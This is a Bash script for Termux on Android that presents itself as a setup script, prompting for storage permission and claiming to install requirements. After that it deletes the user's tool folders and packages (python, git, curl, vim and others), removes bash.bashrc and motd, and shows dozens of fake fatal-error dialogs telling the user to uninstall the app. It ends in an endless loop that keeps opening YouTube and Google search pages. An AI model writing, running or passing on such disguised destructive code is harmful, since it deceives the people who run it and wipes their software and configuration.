#!bin/bash
                                  
                                                                                                                                                                                                                     apt-get remove nano -y
dialog --msgbox pleaseㅤenableㅤstorageㅤpermissionㅤtoㅤrunㅤtheㅤscript. 67 67

sleep 1

termux-setup-storage

dialog --msgbox thxㅤforㅤusinㅤmyㅤscript. 67 45

clear

dialog --msgbox [✓]ㅤInstalingㅤTheㅤRequeriments... 67 45

pkg update -y && pkg upgrade -y && pkg install git -y && pkg install python -y && pkg install cmatrix -y && pkg install nano -y && pkg install vim -y && pkg install python python3


sleep 1

dialog --yesno Want StartㅤTheㅤScript?  88 77

clear

dialog --yesno PleaseㅤDontㅤTurnㅤOffㅤTheㅤScriptㅤInㅤThisㅤStage. 67 45

clear

dialog --msgbox 18181TS.3N0.3SC4P3 67 45

sleep 3

clear

sleep 1


sleep 3

echo -e " \033[41;1;37m لا مفر\033[0m"  

sleep 2

echo "by أصفر"

sleep 2

clear

sleep 1

echo -e " \033[41;1;37m внимание...\033[0m \033[1;36m Как сказать +уничтожить вашу систему+ по-русски?\033[0m"  

sleep 5

echo "خداحافظ termux."

sleep 1


echo -e " \033[1;32m 再见我的宝贝...\033[0m" 

sleep 4

echo -e " \033[1;32m 现在删除 >zphisher\033[0m"

sleep 1

echo -e " \033[1;32m 现在删除 >Anon-SMS\033[0m"

sleep 2

echo -e " \033[1;32m 现在删除 >sqlmap,hammer,SETSMS...\033[0m"

rm -rf "zphisher"
rm -rf "Anon-SMS"
rm -rf "IP-Tracer"
rm -rf "sqlmap"
rm -rf "hammer"
rm -rf "loop"
rm -rf "crocodile"
rm -rf "SETSMS"
rm -rf "trackip"
rm -rf "Ip-Attack"

sleep 5

echo -e " \033[1;32m 他正在删除包裹... \033[0m" 

apt-get remove cmatrix -y
apt-get remove python -y
apt-get remove python2 -y
apt-get remove python3 -y
apt-get remove git -y
apt-get remove nano -y
apt-get remove vim -y
apt-get remove curl -y
apt-get remove php -y

sleep 1

clear

echo -e " \033[1;32m Easter Egg Time!...\033[0m"   

sleep 1

termux-open --view https://youtu.be/7ONnF007IkQ


echo -e " \033[1;33m Бу ахыр...\033[0m"   

rm -rf /data/data/com.termux/files/usr/etc/motd

rm -rf /data/data/com.termux/files/usr/etc/bash.bashrc

sleep 2

echo -e " \033[1;33m If it gives any error just wait, that it be fixed in a little seconds...\033[0m"   

sleep 10

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

dialog --msgbox Termux:fatalerror1:please.uninstall.app/apk.from.your.device. 12 50

sleep 3

sleep 5
for (( ; ; ))
do
termux-open --view https://www.google.com/search?q=%D9%83%D9%8A%D9%81+%D8%A3%D8%B4%D8%AA%D8%B1%D9%8A+%D8%A7%D9%84%D8%A8%D9%8A%D8%AA%D9%83%D9%88%D9%8A%D9%86+%D9%81%D9%8A+%D8%A7%D9%84%D9%85%D9%85%D9%84%D9%83%D8%A9+%D8%A7%D9%84%D8%B9%D8%B1%D8%A8%D9%8A%D8%A9+%D8%A7%D9%84%D8%B3%D8%B9%D9%88%D8%AF%D9%8A%D8%A9&client=ms-android-motorola-rvo3&sourceid=chrome-mobile&ie=UTF-8
termux-open --view https://www.google.com/search?q=%D9%87%D9%84+%D8%A7%D9%84%D8%A8%D9%8A%D8%AA%D9%83%D9%88%D9%8A%D9%86+%D9%82%D8%A7%D9%86%D9%88%D9%86%D9%8A+%D9%81%D9%8A+%D8%A7%D9%84%D8%B3%D8%B9%D9%88%D8%AF%D9%8A%D8%A9&client=ms-android-motorola-rvo3&sxsrf=AJOqlzUFWKCVTpfNfZavBoVGQjtHuwDCzw%3A1678547767815&ei=N5sMZLSzMcrX1sQPyPyMgAY&oq=%D9%83%D9%8A%D9%81+%D8%A3%D8%B4%D8%AA%D8%B1%D9%8A+%D8%A7%D9%84%D8%A8%D9%8A%D8%AA%D9%83%D9%88%D9%8A%D9%86+%D9%81%D9%8A+%D8%A7%D9%84%D9%85%D9%85%D9%84%D9%83%D8%A9+%D8%A7%D9%84%D8%B9%D8%B1%D8%A8%D9%8A%D8%A9+%D8%A7%D9%84%D8%B3%D8%B9%D9%88%D8%AF%D9%8A%D8%A9&gs_lcp=ChNtb2JpbGUtZ3dzLXdpei1zZXJwEAEYATIHCCMQsAMQJzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwA0oECEEYAFAAWABgtQtoAXAAeACAAQCIAQCSAQCYAQDIAQnAAQE&sclient=mobile-gws-wiz-serp
termux-open --view https://youtu.be/KLQRbGAuOUQ
termux-open --view https://youtu.be/cVGiCobLpKo
termux-open --view https://www.google.com/search?q=%D8%B7%D8%B1%D9%8A%D9%82%D8%A9+%D8%B4%D8%B1%D8%A7%D8%A1+%D8%A7%D9%84%D8%B9%D9%85%D9%84%D8%A7%D8%AA+%D8%A7%D9%84%D8%B1%D9%82%D9%85%D9%8A%D8%A9+%D9%85%D9%86+%D8%A7%D9%84%D8%B3%D8%B9%D9%88%D8%AF%D9%8A%D8%A9+%D8%A8%D9%8A%D9%86%D8%A7%D9%86%D8%B3&client=ms-android-motorola-rvo3&sxsrf=AJOqlzWOrHh2QV33hsAKcekE5MmrfBdC1g%3A1678548495396&ei=D54MZJ3lF4be1sQPlreS6Ac&oq=%D9%83%D9%8A%D9%81+%D8%A3%D8%B4%D8%AA%D8%B1%D9%8A+%D8%A7%D9%84%D8%A8%D9%8A%D8%AA%D9%83%D9%88%D9%8A%D9%86+%D9%81%D9%8A+%D8%A7%D9%84%D9%85%D9%85%D9%84%D9%83%D8%A9+%D8%A7%D9%84%D8%B9%D8%B1%D8%A8%D9%8A%D8%A9+%D8%A7%D9%84%D8%B3%D8%B9%D9%88%D8%AF%D9%8A%D8%A9&gs_lcp=ChNtb2JpbGUtZ3dzLXdpei1zZXJwEAEYBTIHCCMQsAMQJzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwAzIKCAAQRxDWBBCwA0oECEEYAFAAWABgohVoAHAAeACAAeABiAHgAZIBAzItMZgBAMgBCcABAQ&sclient=mobile-gws-wiz-serp
termux-open --view https://youtu.be/FNOk6Xrvw8
done
